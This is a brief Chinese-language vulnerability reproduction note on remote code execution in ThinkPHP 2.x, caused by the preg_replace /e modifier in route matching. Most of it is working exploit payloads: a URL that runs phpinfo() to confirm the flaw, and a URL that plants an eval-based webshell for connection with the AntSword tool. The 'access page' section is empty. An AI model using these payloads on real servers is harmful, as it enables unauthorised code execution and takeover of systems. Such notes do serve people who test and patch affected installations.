一、漏洞概述
ThinkPHP ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞
二、影响范围
ThinkPHP 2.x
三、访问页面
四、漏洞复现
1、漏洞验证
/index.php?s=/index/index/xxx/${@phpinfo()}
2、webshell的payload,使用蚁剑等工具连接。
/index.php?s=a/b/c/${@print(eval($_POST[cmd]))}